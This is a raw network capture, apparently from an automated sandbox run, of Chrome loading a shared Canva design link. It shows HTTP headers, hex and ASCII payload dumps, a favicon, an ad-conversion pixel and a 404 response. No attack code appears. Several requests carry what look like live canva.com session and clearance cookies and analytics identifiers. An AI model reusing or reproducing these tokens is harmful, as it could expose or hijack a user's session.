                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJ [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC1740OUTData Raw: 7b 22 6d 65 6d 6f 72 79 22 3a 7b 22 74 6f 74 61 6c 4a 53 48 65 61 70 53 69 7a 65 22 3a 33 39 35 38 31 34 33 31 2c 22 75 73 65 64 4a 53 48 65 61 70 53 69 7a 65 22 3a 32 36 34 35 30 35 36 33 2c 22 6a 73 48 65 61 70 53 69 7a 65 4c 69 6d 69 74 22 3a 32 31 37 32 36 34 39 34 37 32 7d 2c 22 72 65 73 6f 75 72 63 65 73 22 3a 5b 5d 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 65 76 65 6e 74 54 79 70 65 22 3a 31 2c 22 66 69 72 73 74 50 61 69 6e 74 22 3a 32 31 35 37 38 2e 31 30 30 30 30 30 30 30 30 30 30 36 2c 22 66 69 72 73 74 43 6f 6e 74 65 6e 74 66 75 6c 50 61 69 6e 74 22 3a 32 31 35 37 38 2e 31 30 30 30 30 30 30 30 30 30 30 36 2c 22 73 74 61 72 74 54 69 6d 65 22 3a 31 37 33 34 36 34 33 36 33 36 39 30 38 2c 22 76 65 72 73 69 6f 6e 73 22 3a 7b 22 66 6c 22 3a 22
                                                                                                                                                                                                                                                    Data Ascii: {"memory":{"totalJSHeapSize":39581431,"usedJSHeapSize":26450563,"jsHeapSizeLimit":2172649472},"resources":[],"referrer":"","eventType":1,"firstPaint":21578.100000000006,"firstContentfulPaint":21578.100000000006,"startTime":1734643636908,"versions":{"fl":"
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC370INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:47 GMT
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    access-control-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    access-control-allow-methods: POST,OPTIONS
                                                                                                                                                                                                                                                    access-control-max-age: 86400
                                                                                                                                                                                                                                                    vary: Origin
                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f4a7a889b360f42-EWR
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    91192.168.2.449847104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC1627OUTGET /static/images/favicon-1.ico HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=iXUqyvIydFpwl7XXa9K64SvmeL%2F%2FMTji7nTeBo05Th040svWJMVFQljR3%2BPeFSp8S7dVUpgLEabZoNIEKBFboDK1Xd0NNCjJaZ42FWoKukmv91PXxcLdIeiajgv%2Fzg%3D% [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC1364INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:47 GMT
                                                                                                                                                                                                                                                    Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                                    Content-Length: 4414
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a898a924406-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 74390
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "a0c86da7fc37ea50e848c4733761d53e"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:33 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 26 Sep 2024 23:42:56 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: qmu3uJIrITcBkPZN3RSh6KNHzdpLU8UCmnheU/729R4Vqvv6b0vAIElprWUjy17EBzhwaUtlF5dAgmBSrNX8MJi3cY706Gq5
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: QHY2G6YRGMK0V2M3
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: REYKMVSvn4pQBvQM7t126sw17ADi9h4U
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FSt3fEjHDpf5XGMQjPQjoP%2BER9UQ0mdQaw5ny8vdZJS4jRzFOrmCtoStjz69RPWosfh2H%2BfX46F1arRgtUTkaz%2B%2FIitywLrWgmEvvDnSzFSBLeK33lEY22MJ6SPRtdfKFA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC92INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC1369INData Raw: 00 00 01 00 01 00 20 20 00 00 01 00 20 00 28 11 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 10 00 00 13 0b 00 00 13 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 01 ff 40 80 04 00 00 00 00 00 00 00 00 f3 23 68 16 f9 21 67 5c fc 22 68 9d fa 21 69 c9 f8 23 6b e3 f7 24 6c fb f6 24 6e fb f5 24 6f e3 f2 25 71 c9 f2 25 72 9d f1 27 73 5b e8 23 74 16 00 00 00 00 00 00 00 00 ff 40 80 04 ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 55 55 03 00 00 00 00 00 00 00 00 f9 2c 5d 29 fa 2b 5f 9f fb 29 62 f2 ff 2a 6a ff ff 29 6c ff ff 27 6c ff ff 25 6c ff f8 24 6b ff f7
                                                                                                                                                                                                                                                    Data Ascii: (( @ @#h!g\"h!i#k$l$n$o%q%r's[#t@UU,])+_)b*j)l'l%l$k
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC1369INData Raw: ff e4 5f 00 ff f8 e2 dc ff ff ff ff ff ff ff ff ff fa e7 e4 ff e5 58 00 ff e7 6d 45 ff e7 69 3e ff e6 67 3c ff e6 67 3d ff e5 66 3f ff e5 6a 48 ff e5 67 48 ff e1 35 00 ff f7 dd db ff fa ea ea ff e0 3e 27 ff e2 5b 59 ff e3 51 59 ff e3 4c 5f ff e3 46 64 ff e4 40 6a fe e7 3a 72 ff e6 35 75 f2 dc 2e 74 16 e0 81 2d 5b ed 89 30 ff de 80 2d fb e0 7f 2d ff e0 7d 2e ff e1 7d 33 ff e1 75 16 ff e5 8b 5e ff fe fa f9 ff ff fe fe ff ff ff ff ff ef b9 a9 ff e2 5d 00 ff e5 75 41 ff e4 6f 36 ff e4 6f 38 ff e4 6e 39 ff e3 6d 3a ff e3 6c 3b ff e3 6d 43 ff e2 66 3a ff e2 6b 4a ff fd f7 f6 ff e8 9a 90 ff df 4a 30 ff e1 5d 58 ff e1 54 59 ff e2 4e 5e ff e2 48 64 ff e3 42 6a fb f3 3e 77 ff e6 38 73 5b db 8a 29 9d ea 92 2b ff db 88 28 fb dc 87 28 ff dd 86 28 ff de 87 34 ff dd 78
                                                                                                                                                                                                                                                    Data Ascii: _XmEi>g<g=f?jHgH5>'[YQYL_Fd@j:r5u.t-[0--}.}3u^]uAo6o8n9m:l;mCf:kJJ0]XTYN^HdBj>w8s[)+(((4x
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC1369INData Raw: d8 7a 3c fb e8 7a 46 ff db 6f 45 5c d1 ae 0c 16 d0 b3 0e f2 d1 b7 0c ff cf b7 0a fe ce b8 09 ff ce b9 08 ff ce ba 05 ff cf bc 26 ff c9 b5 00 ff e6 de b3 ff ff ff ff ff ff ff ff ff f5 f1 e2 ff cc b4 00 ff cf b7 20 ff cf b4 16 ff cf b1 0d ff d0 af 0f ff d1 ae 28 ff ce a2 00 ff f1 e7 d6 ff ff ff ff ff f8 f3 ec ff d3 9d 1d ff d3 98 23 ff d4 94 29 ff d5 8f 2c ff d6 89 30 ff d7 85 34 fe da 7f 3a ff d9 78 3e f2 dc 74 46 16 00 00 00 00 cf b5 0b 9f dd c3 0b ff ce b9 09 fa ce ba 08 ff ce bb 07 ff cd bc 07 ff cd bd 0a ff cd be 12 ff cb bb 00 ff f3 f0 de ff ff ff ff ff ff ff ff ff e8 e1 bb ff c8 b1 00 ff cf b9 22 ff cf b7 27 ff cf b4 19 ff d1 b4 32 ff cc a7 00 ff ec e1 c6 ff ff ff ff ff fb f9 f4 ff d5 a9 4d ff d2 9a 00 ff d4 98 29 ff d4 92 28 ff d5 8d 2d ff d6 89 31
                                                                                                                                                                                                                                                    Data Ascii: z<zFoE\& (#),04:x>tF"'2M)(-1
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC307INData Raw: b9 0a 9d cd b4 0b 5c d1 ae 0c 16 00 00 00 00 00 00 00 00 ff bf 00 04 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                    Data Ascii: \


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    92192.168.2.449848172.217.19.228443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC2181OUTGET /pagead/1p-conversion/804757079/?random=960307558&fst=1734643657472&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902&value=0&url=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&tiba=Canva%20Design&data=event%3Dnew.user.engagement%3Bgtm_web_details%3DGTM-TZPTKRR%20%7C%20297%3Bevent_id%3D1734644380069_173464376514863%3Bcustom_dicbo%3Dnot%20set%3Bcustom_consent_gtm_outbrain%3Dyes%3Bcustom_consent_gtm_fpc_rtid%3Dyes%3Bcustom_data_newSession2%3D1%3Bcustom_device_category%3Ddesktop%3Bcustom_event_name%3Dnew.user.engagement%3Bcustom_quantity%3D0%3Bcustom_step%3Dnot%20set%3Bcustom_user_type_by_user_id%3Dguest%3Bevent_action%3Dno-value%3Bcustom_doctype_id%3DTAFJi5FXMSs%3Bcustom_product_variant%3Dweb-2%3Bcustom_country_code%3DUS%3Bcustom_app_name%3Dweb&rdp=1&dma=0&npa=0&gcd=13l3l3l [TRUNCATED]
                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:48 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:48 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                    Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                    Content-Length: 42
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    2024-12-19 21:27:48 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    93192.168.2.449849104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:48 UTC1977OUTGET /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJ [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC1075INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:48 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a92d8da427c-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                    x-request-id: 8f4a7a92d8da427c
                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wAG2Ls8Ugdu1n%2B7jJFndbDej2pRKExZZUpGUn9FDoT3ZONYz3zDalgrgID9qZD4OWJT%2FSZOtKjGkOBtWyZOiBRu4jG0LDC4MiI%2FyqUbE%2BqiUWULRr%2FGOo6CUtQcQb5Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC64INData Raw: 33 61 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 6e 6f 74 20 66 6f 75 6e 64 22 7d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 3a'"])}while(1);</x>//{"statusCode":404,"error":"not found"}
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    94192.168.2.449850104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:48 UTC933OUTGET /static/images/favicon-1.ico HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=iXUqyvIydFpwl7XXa9K64SvmeL%2F%2FMTji7nTeBo05Th040svWJMVFQljR3%2BPeFSp8S7dVUpgLEabZoNIEKBFboDK1Xd0NNCjJaZ42FWoKukmv91PXxcLdIeiajgv%2Fzg%3D%3D
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:49 GMT
                                                                                                                                                                                                                                                    Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                                    Content-Length: 4414
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a941f0f0cc8-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 74392
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "a0c86da7fc37ea50e848c4733761d53e"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:35 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 26 Sep 2024 23:42:56 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: qmu3uJIrITcBkPZN3RSh6KNHzdpLU8UCmnheU/729R4Vqvv6b0vAIElprWUjy17EBzhwaUtlF5dAgmBSrNX8MJi3cY706Gq5
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: QHY2G6YRGMK0V2M3
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: REYKMVSvn4pQBvQM7t126sw17ADi9h4U
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
